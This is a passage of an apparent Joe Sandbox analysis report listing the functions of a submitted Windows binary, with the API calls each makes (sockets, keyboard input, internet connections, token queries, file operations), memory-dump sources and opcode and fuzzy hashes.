                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: 9515bee86ea496f9376553423f347dff2726544d17bc24632b92b956410a7ecb
                                                                                                                    • Instruction ID: 4bafebe606471296255c82ae8d27efd831f43c2867d57de7572122127f0fef8c
                                                                                                                    • Opcode Fuzzy Hash: 9515bee86ea496f9376553423f347dff2726544d17bc24632b92b956410a7ecb
                                                                                                                    • Instruction Fuzzy Hash: 37417475A00218ABDF23DF54D845FEE7BB9EF45710F00406AF909AB291DB749A44CB91
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 003969D1
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003969E1
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00396A45
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00396A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2214342067-0
                                                                                                                    • Opcode ID: fd91297490b08e98613d2532bda0998c39135ae3c67901a15c706b1ba7f57405
                                                                                                                    • Instruction ID: 213a081bc8c515474badcc211056e5293f74266631ed742c078e2cdeadc28097
                                                                                                                    • Opcode Fuzzy Hash: fd91297490b08e98613d2532bda0998c39135ae3c67901a15c706b1ba7f57405
                                                                                                                    • Instruction Fuzzy Hash: 6141B175740210AFEB62AF64DC87F3A77E89F09B14F44C419FA59AF2C2DA749D008B91
                                                                                                                    APIs
                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003AF910), ref: 003964A7
                                                                                                                    • _strlen.LIBCMT ref: 003964D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218353326-0
                                                                                                                    • Opcode ID: fea589d8edddc3df66d6f2c066de7704fca6edbc5d75cf2017815b63c792f7c4
                                                                                                                    • Instruction ID: c040a08933a8d33c2029841c40196b16a260a435a889a5b86e54eb5e6ff6e273
                                                                                                                    • Opcode Fuzzy Hash: fea589d8edddc3df66d6f2c066de7704fca6edbc5d75cf2017815b63c792f7c4
                                                                                                                    • Instruction Fuzzy Hash: 0E41B771A00214AFCF16EBA4EC96FAEB7ADAF45310F158155F8199F292DB30EE44C750
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038B89E
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0038B8C4
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038B8E9
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038B915
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 1a7929303f4714dd5f8fe95dbf259517e2fec352da02a601317d458c0e92fa9a
                                                                                                                    • Instruction ID: 661ea6db61f98b06a6ce24c4bf53067dc2a72bf3deb3ea096708694e0e658d03
                                                                                                                    • Opcode Fuzzy Hash: 1a7929303f4714dd5f8fe95dbf259517e2fec352da02a601317d458c0e92fa9a
                                                                                                                    • Instruction Fuzzy Hash: 73412A39600661DFCB12EF55D484A59BBE5EF8A310F098099EC4A9F362CB30FD01CB95
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003A88DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: a968792e09eba139ee255c6283cc6828ca001fdb4d4db90ff4323133e6ab5175
                                                                                                                    • Instruction ID: 8d643d999d0444bef33c662aa5450537eb294bc1f31e04e45398ada8a9d07ef7
                                                                                                                    • Opcode Fuzzy Hash: a968792e09eba139ee255c6283cc6828ca001fdb4d4db90ff4323133e6ab5175
                                                                                                                    • Instruction Fuzzy Hash: C531D234600108AFEB279F58CC85BBA77B9EB07310F55451AFA51E61E1CF74D9409752
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 003AAB60
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003AABD6
                                                                                                                    • PtInRect.USER32(?,?,003AC014), ref: 003AABE6
                                                                                                                    • MessageBeep.USER32(00000000), ref: 003AAC57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: ada50d6b538443c6a79ce5a84979e525fb7a1846c7a72019922d7c651e1c1cea
                                                                                                                    • Instruction ID: f1ad885b1d085ec7348d01820df41465e2c8dff85f08ec988a4cab571e1f6aa8
                                                                                                                    • Opcode Fuzzy Hash: ada50d6b538443c6a79ce5a84979e525fb7a1846c7a72019922d7c651e1c1cea
                                                                                                                    • Instruction Fuzzy Hash: 99418E32600A19DFDB27DF58C884A697BF9FB4A320F1581A9E815DF260D730E841CB92
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00380B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00380B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00380BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00380BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 4cbfd83767abdbf67ac8b1ab4a6692c6dd0cc230614294e4382aadf82da86b1a
                                                                                                                    • Instruction ID: 603b4ac7f4be45d250c3b93192fb72df92dbe59ba90664607feb2211da594738
                                                                                                                    • Opcode Fuzzy Hash: 4cbfd83767abdbf67ac8b1ab4a6692c6dd0cc230614294e4382aadf82da86b1a
                                                                                                                    • Instruction Fuzzy Hash: E5315A30D40308AFFF7BAB658C05BFABBA9AB45318F0442DAE490561D1C379C9489751
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00380C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00380C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00380CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00380D33
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: f588b3382f4f5bb52e7ee702d39e6c53f8b6d17d1b6b2c3cd4a0c6252a87e8bd
                                                                                                                    • Instruction ID: c0a6624324cbadccdc444c70c3dfda224f7fafaaea3d8e507b08727928b0583b
                                                                                                                    • Opcode Fuzzy Hash: f588b3382f4f5bb52e7ee702d39e6c53f8b6d17d1b6b2c3cd4a0c6252a87e8bd
                                                                                                                    • Instruction Fuzzy Hash: 0E315830940308AEFF7BAFA5CC047FEBB7AAB46310F0583AAE4945A1D1C339994D8751
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003561FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00356229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00356257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0035628D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: d25c208411cb960ab0203caf189c469bdfbe745698baab39e381a000d278d8e9
                                                                                                                    • Instruction ID: 4a564bf01a664a8ab86d373f0c4805ec6c775f04d26a382cfd7492ebafc6c783
                                                                                                                    • Opcode Fuzzy Hash: d25c208411cb960ab0203caf189c469bdfbe745698baab39e381a000d278d8e9
                                                                                                                    • Instruction Fuzzy Hash: 9431C030604246AFDF228F65CC46FBA7BB9FF42311F564528EC649B1A1DB30E954DB90
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 003A4F02
                                                                                                                      • Part of subcall function 00383641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038365B
                                                                                                                      • Part of subcall function 00383641: GetCurrentThreadId.KERNEL32 ref: 00383662
                                                                                                                      • Part of subcall function 00383641: AttachThreadInput.USER32(00000000,?,00385005), ref: 00383669
                                                                                                                    • GetCaretPos.USER32(?), ref: 003A4F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 003A4F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 003A4F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 22617b957971727372becf1dc97b816c839d9e4b8646212e1ec08fb875f846e7
                                                                                                                    • Instruction ID: 75340c854fe037d22cb9c56a27718651579d9ef89bd25eba31298820927199d8
                                                                                                                    • Opcode Fuzzy Hash: 22617b957971727372becf1dc97b816c839d9e4b8646212e1ec08fb875f846e7
                                                                                                                    • Instruction Fuzzy Hash: DA313E71D00218AFDB01EFA5D885AEFB7FDEF99300F10446AE415E7201EA759E058BA0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetCursorPos.USER32(?), ref: 003AC4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0035B9AB,?,?,?,?,?), ref: 003AC4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 003AC534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0035B9AB,?,?,?), ref: 003AC56E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: 3b0076615707f29d5953a7b654dddf1c92e54b4874515e6af3289e6e6582122f
                                                                                                                    • Instruction ID: e297d3757039b4b6d57ef433f4f22471024e2bb56795492f40e620352b81ce53
                                                                                                                    • Opcode Fuzzy Hash: 3b0076615707f29d5953a7b654dddf1c92e54b4874515e6af3289e6e6582122f
                                                                                                                    • Instruction Fuzzy Hash: E8319339A10058EFCB278F99C898EEA7BB9EF0B310F044165F9058B261C731AD50DBA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0037810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00378121
                                                                                                                      • Part of subcall function 0037810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037812B
                                                                                                                      • Part of subcall function 0037810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037813A
                                                                                                                      • Part of subcall function 0037810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00378141
                                                                                                                      • Part of subcall function 0037810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00378157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003786A3
                                                                                                                    • _memcmp.LIBCMT ref: 003786C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003786FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00378703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 812b7e34710726d2a2e30e0c49d8baa2c3ce4af1512cd8e272d601c679d7744b
                                                                                                                    • Instruction ID: 37b8a0ed5871c904e4e820cf3a76d8182a7cb99ccb8f4c16ba97a74641ff2336
                                                                                                                    • Opcode Fuzzy Hash: 812b7e34710726d2a2e30e0c49d8baa2c3ce4af1512cd8e272d601c679d7744b
                                                                                                                    • Instruction Fuzzy Hash: 06219071E80108FFDB21DFA4C949BEEB7B8EF45304F158059E548AB240DB34AE05CB60
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 003409AE
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
                                                                                                                    • _fprintf.LIBCMT ref: 003409E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00375DBB
                                                                                                                      • Part of subcall function 00344AAA: _flsall.LIBCMT ref: 00344AC3
                                                                                                                    • __setmode.LIBCMT ref: 00340A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: ef830669ab3c0affd7abcc0381a031ac8cd433fdf35b8dc28593fc8fee71c149
                                                                                                                    • Instruction ID: 5938c256af40dc73e1977be606cafbc006f1e62ac56e5a54571155cbc3b1ee18
                                                                                                                    • Opcode Fuzzy Hash: ef830669ab3c0affd7abcc0381a031ac8cd433fdf35b8dc28593fc8fee71c149
                                                                                                                    • Instruction Fuzzy Hash: E4112731A042046FDB0BB7B4AC47AFE77EC9F46320F64416AF2045F192EF74694257A5
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003917A3
                                                                                                                      • Part of subcall function 0039182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0039184C
                                                                                                                      • Part of subcall function 0039182D: InternetCloseHandle.WININET(00000000), ref: 003918E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: c3007cc5d6b6b1cf4d57d58a2b8b4f79f5f87b94bdbe44192580e3baf93a6f8f
                                                                                                                    • Instruction ID: 0dcdda753aacd01b6453379da28783162af8b5fb044736f1e2baed3905047186
                                                                                                                    • Opcode Fuzzy Hash: c3007cc5d6b6b1cf4d57d58a2b8b4f79f5f87b94bdbe44192580e3baf93a6f8f
                                                                                                                    • Instruction Fuzzy Hash: F921A431204606BFEF139FA0DC41FBBBBADFF49750F10452AF951A6650D7729811ABA0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,003AFAC0), ref: 00383A64
                                                                                                                    • GetLastError.KERNEL32 ref: 00383A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00383A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003AFAC0), ref: 00383ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 79b8ffd10ac0ca947bbeb969a43f395d69f1d4469bb5be5de5f0b08f38b3f588
                                                                                                                    • Instruction ID: 723f9fd72b27101369d666adb799bf311d2c6b283287cb1dbddea82641141f27
                                                                                                                    • Opcode Fuzzy Hash: 79b8ffd10ac0ca947bbeb969a43f395d69f1d4469bb5be5de5f0b08f38b3f588
                                                                                                                    • Instruction Fuzzy Hash: 7021D1745083018FC716EF28D8818AAB7E8FE16764F104A6DF499C73A1DB31DE46CB82
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00355101
                                                                                                                      • Part of subcall function 0034571C: __FF_MSGBANNER.LIBCMT ref: 00345733
                                                                                                                      • Part of subcall function 0034571C: __NMSG_WRITE.LIBCMT ref: 0034573A
                                                                                                                      • Part of subcall function 0034571C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
